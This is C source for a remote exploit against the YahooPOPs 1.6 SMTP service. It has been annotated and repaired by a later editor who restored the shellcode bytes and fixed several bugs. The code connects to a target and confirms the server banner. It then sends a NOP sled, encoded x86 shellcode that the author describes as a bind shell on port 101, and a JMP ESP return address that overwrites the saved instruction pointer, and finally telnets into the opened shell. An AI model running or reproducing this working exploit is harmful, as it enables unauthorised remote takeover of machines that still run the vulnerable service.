//Diabolic Crab's exploit for YahooPOPs <= 1.6 SMTP
//
//www.hackerscenter.com
//For more work check out, http://icis.digitalparadox.org
//This was done at 4 am, so excuse the messy code, if any
//Good job class101 on the windows version ;)
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
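/* Encoded x86 payload, copied by the author from class101's Windows exploit
 * and described there as a bind shell on TCP port 101 (the blob is not decoded
 * or verified here). As printed, every "\xNN" escape had lost its backslash,
 * so the array held ASCII text instead of bytes; this restores the escapes.
 * 407 bytes, none of them 0x00, so it survives the string functions in main().
 * sizeof(scode) is 408 (terminator included) and main() sizes the NOP sled
 * from that value, so keep this a plain char array. */
char scode[] =
    "\xEB"
    "\x0F\x58\x80\x30\x88\x40\x81\x38\x68\x61\x63\x6B\x75\xF4\xEB\x05\xE8\xEC\xFF\xFF"
    "\xFF\x60\xDE\x88\x88\x88\xDB\xDD\xDE\xDF\x03\xE4\xAC\x90\x03\xCD\xB4\x03\xDC\x8D"
    "\xF0\x89\x62\x03\xC2\x90\x03\xD2\xA8\x89\x63\x6B\xBA\xC1\x03\xBC\x03\x89\x66\xB9"
    "\x77\x74\xB9\x48\x24\xB0\x68\xFC\x8F\x49\x47\x85\x89\x4F\x63\x7A\xB3\xF4\xAC\x9C"
    "\xFD\x69\x03\xD2\xAC\x89\x63\xEE\x03\x84\xC3\x03\xD2\x94\x89\x63\x03\x8C\x03\x89"
    "\x60\x63\x8A\xB9\x48\xD7\xD6\xD5\xD3\x4A\x80\x88\xD6\xE2\xB8\xD1\xEC\x03\x91\x03"
    "\xD3\x84\x03\xD3\x94\x03\x93\x03\xD3\x80\xDB\xE0\x06\xC6\x86\x64\x77\x5E\x01\x4F"
    "\x09\x64\x88\x89\x88\x88\xDF\xDE\xDB\x01\x6D\x60\xAF\x88\x88\x88\x18\x89\x88\x88"
    "\x3E\x91\x90\x6F\x2C\x91\xF8\x61\x6D\xC1\x0E\xC1\x2C\x92\xF8\x4F\x2C\x25\xA6\x61"
    "\x51\x81\x7D\x25\x43\x65\x74\xB3\xDF\xDB\xBA\xD7\xBB\xBA\x88\xD3\x05\xC3\xA8\xD9"
    "\x77\x5F\x01\x57\x01\x4B\x05\xFD\x9C\xE2\x8F\xD1\xD9\xDB\x77\xBC\x07\x77\xDD\x8C"
    "\xD1\x01\x8C\x06\x6A\x7A\xA3\xAF\xDC\x77\xBF\x77\xDD\xB8\xB9\x48\xD8\xD8\xD8\xD8"
    "\xC8\xD8\xC8\xD8\x77\xDD\xA4\x01\x4F\xB9\x53\xDB\xDB\xE0\x8A\x88\x88\xED\x01\x68"
    "\xE2\x98\xD8\xDF\x77\xDD\xAC\xDB\xDF\x77\xDD\xA0\xDB\xDC\xDF\x77\xDD\xA8\x01\x4F"
    "\xE0\xCB\xC5\xCC\x88\x01\x6B\x0F\x72\xB9\x48\x05\xF4\xAC\x24\xE2\x9D\xD1\x7B\x23"
    "\x0F\x72\x09\x64\xDC\x88\x88\x88\x4E\xCC\xAC\x98\xCC\xEE\x4F\xCC\xAC\xB4\x89\x89"
    "\x01\xF4\xAC\xC0\x01\xF4\xAC\xC4\x01\xF4\xAC\xD8\x05\xCC\xAC\x98\xDC\xD8\xD9\xD9"
    "\xD9\xC9\xD9\xC1\xD9\xD9\xDB\xD9\x77\xFD\x88\xE0\xFA\x76\x3B\x9E\x77\xDD\x8C\x77"
    "\x58\x01\x6E\x77\xFD\x88\xE0\x25\x51\x8D\x46\x77\xDD\x8C\x01\x4B\xE0\x77\x77\x77"
    "\x77\x77\xBE\x77\x5B\x77\xFD\x88\xE0\xF6\x50\x6A\xFB\x77\xDD\x8C\xB9\x53\xDB\x77"
    "\x58\x68\x61\x63\x6B\x90";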
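/* Scratch buffer in which main() assembles sled + shellcode + return address
 * before sending it; sized well above the ~513 bytes the layout needs. */
static char payload[1024];
/* Value written over the saved return address. The escapes had lost their
 * backslashes in the listing; restored here. Read little-endian the bytes are
 * 0x10029b23, which the author labels as a JMP ESP inside the target. */
char jmp[] = "\x23\x9b\x02\x10";
/* Appended right after the return address: ff e3 encodes JMP EBX on x86. */
char jmpebx[] = "\xff\xe3";
void usage(char *us);
void ver(void);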
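/* Fixed parameters of this exploit, taken from the original author's code
 * and comments. */
enum {
    DEFAULT_SMTP_PORT = 25,
    BIND_SHELL_PORT   = 101,  /* where the author says the shellcode listens */
    OVERFLOW_OFFSET   = 508,  /* bytes of sled + shellcode before the return address */
    BANNER_MAX        = 200   /* how much of the greeting we read, as before */
};

/* Parse a decimal TCP port from text. Returns -1 unless it is in 1..65535. */
static int parse_port(const char *text)
{
    char *end = NULL;
    errno = 0;
    long value = strtol(text, &end, 10);
    if (end == text || *end != '\0' || errno == ERANGE || value < 1 || value > 65535) {
        return -1;
    }
    return (int)value;
}

/* Resolve host (name or dotted quad) to an IPv4 address and open a TCP
 * connection to host:port. Returns the connected socket, or -1 after
 * reporting the reason on stderr. */
static int tcp_connect(const char *host, int port)
{
    struct hostent *he = gethostbyname(host);
    /* Only accept an IPv4 answer whose length matches sin_addr; the original
     * memcpy'd h_length bytes without checking either. */
    if (he == NULL || he->h_addrtype != AF_INET || he->h_addr_list[0] == NULL
        || he->h_length != (int)sizeof(struct in_addr)) {
        fprintf(stderr, "gethostbyname(%s): no IPv4 address found\n", host);
        return -1;
    }

    int sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if (sock < 0) {
        perror("socket()");
        return -1;
    }

    struct sockaddr_in addr;
    memset(&addr, 0, sizeof addr);
    addr.sin_family = AF_INET;
    addr.sin_port = htons((unsigned short)port);
    memcpy(&addr.sin_addr, he->h_addr_list[0], sizeof addr.sin_addr);

    if (connect(sock, (struct sockaddr *)&addr, sizeof addr) != 0) {
        perror("connect()");
        close(sock);
        return -1;
    }
    return sock;
}

/* Read the server greeting into buf (always NUL-terminated, at most cap-1
 * bytes). Returns 1 if it contains the YahooPOPs banner, 0 if not, -1 on a
 * read error. The original strstr()'d an unterminated, uninitialised buffer. */
static int read_banner(int sock, char *buf, size_t cap)
{
    ssize_t got = read(sock, buf, cap - 1);
    if (got < 0) {
        perror("read()");
        return -1;
    }
    buf[got] = '\0';
    return strstr(buf, "220 YahooPOPs") != NULL;
}

/* Assemble the exploit buffer in dst: NOP sled, shellcode, return address,
 * then JMP EBX. The layout is the author's: sizeof(scode) counts the string
 * terminator, so sled + shellcode come to OVERFLOW_OFFSET - 1 bytes and the
 * return address starts at byte 507. Returns the byte count, or 0 (with a
 * message on stderr) if the shellcode or the whole buffer would not fit —
 * the original relied on unsigned wrap-around and unchecked strcat() here. */
static size_t build_payload(char *dst, size_t cap)
{
    size_t code_len = sizeof(scode) - 1;
    size_t jmp_len = sizeof(jmp) - 1;
    size_t jmpebx_len = sizeof(jmpebx) - 1;

    if (sizeof(scode) > OVERFLOW_OFFSET) {
        fprintf(stderr, "shellcode (%zu bytes) exceeds the %d byte offset\n",
                code_len, OVERFLOW_OFFSET);
        return 0;
    }
    size_t sled_len = OVERFLOW_OFFSET - sizeof(scode);
    size_t total = sled_len + code_len + jmp_len + jmpebx_len;
    if (total > cap) {
        fprintf(stderr, "payload (%zu bytes) does not fit in %zu byte buffer\n",
                total, cap);
        return 0;
    }

    memset(dst, 0x90, sled_len);                            /* NOP sled */
    memcpy(dst + sled_len, scode, code_len);
    memcpy(dst + sled_len + code_len, jmp, jmp_len);        /* saved EIP -> JMP ESP */
    memcpy(dst + sled_len + code_len + jmp_len, jmpebx, jmpebx_len);
    return total;
}

/* Run "telnet host 101" in a child with an explicit argv. The original built
 * the command line with sprintf() into a 100-byte buffer and handed it to
 * system(), so a long or shell-metacharacter host string could overflow the
 * buffer or run arbitrary commands. Returns telnet's exit status, or -1 if it
 * could not be started or waited for. */
static int spawn_telnet(const char *host)
{
    char port[16];
    snprintf(port, sizeof port, "%d", BIND_SHELL_PORT);

    pid_t child = fork();
    if (child < 0) {
        perror("fork()");
        return -1;
    }
    if (child == 0) {
        execlp("telnet", "telnet", host, port, (char *)NULL);
        perror("execlp(telnet)");
        _exit(127);
    }

    int status = 0;
    if (waitpid(child, &status, 0) < 0) {
        perror("waitpid()");
        return -1;
    }
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

/* Entry point: connect to the YahooPOPs SMTP service on argv[1] (port argv[2],
 * default 25), check the banner, send the overflow buffer, then attach to the
 * port the shellcode is expected to open. Exit status is -1 for usage / wrong
 * server, 1 for a network or layout failure, 0 once telnet has been run.
 * The original required three arguments (argc < 4), which made its optional
 * port branch (argc == 3) unreachable. */
int main(int argc, char *argv[])
{
    ver();
    if (argc < 2) {
        usage(argv[0]);
        return -1;
    }
    const char *host = argv[1];

    int port = DEFAULT_SMTP_PORT;
    if (argc >= 3) {
        port = parse_port(argv[2]);
        if (port < 0) {
            fprintf(stderr, "bad port: %s\n", argv[2]);
            return -1;
        }
    }

    int sock = tcp_connect(host, port);
    if (sock < 0) {
        return 1;
    }
    printf("[+] Connected\n");
    fflush(stdout);

    sleep(2);  /* give the daemon time to send its greeting */
    char banner[BANNER_MAX + 1];
    printf("[+] Reading Banner\n");
    int found = read_banner(sock, banner, sizeof banner);
    if (found != 1) {
        if (found == 0) {
            printf("[+] this is not a YahooPOPS server, quitting...\n");
        }
        close(sock);
        return -1;
    }
    printf("[+] Found YahooPOP's Server\n");

    size_t len = build_payload(payload, sizeof payload);
    if (len == 0) {
        close(sock);
        return 1;
    }
    printf("[+] Sending Shellcode\n");
    if (send(sock, payload, len, 0) < 0) {
        perror("send()");
        close(sock);
        return 1;
    }

    printf("[+] Sleep for 3 seconds\n");
    fflush(stdout);
    sleep(3);  /* as in the original: wait before connecting to the bind port */
    int rc = spawn_telnet(host);
    close(sock);  /* the original never closed the SMTP socket */
    return rc < 0 ? 1 : 0;
}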
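/* Print the command-line usage to stderr. us is argv[0]; a NULL or empty
 * value falls back to the program's conventional name. The listing's
 * messages had lost their newlines, and the original ignored us and
 * documented the port as mandatory although main() defaults it to 25. */
void usage(char *us)
{
    const char *prog = (us != NULL && *us != '\0') ? us : "./dc_ypop";
    fprintf(stderr, "Usage: %s ip [port]\n", prog);
    fprintf(stderr, "The exploit binds a shell to the port 101.\n");
}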
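/* Print the start-up banner (title, site, credits) to stdout, one line each.
 * The listing's strings had lost their trailing newlines; puts() supplies them. */
void ver(void)
{
    static const char *const banner[] = {
        "################################################################",
        "# Diabolic Crab's Bind Shell Exploit for YahooPOPS <= 1.6 SMTP #",
        "# www.hackerscenter.com #",
        "# Credits to Behrang Fouladi for finding this bug #",
        "################################################################",
    };
    for (size_t i = 0; i < sizeof banner / sizeof banner[0]; i++) {
        puts(banner[i]);
    }
}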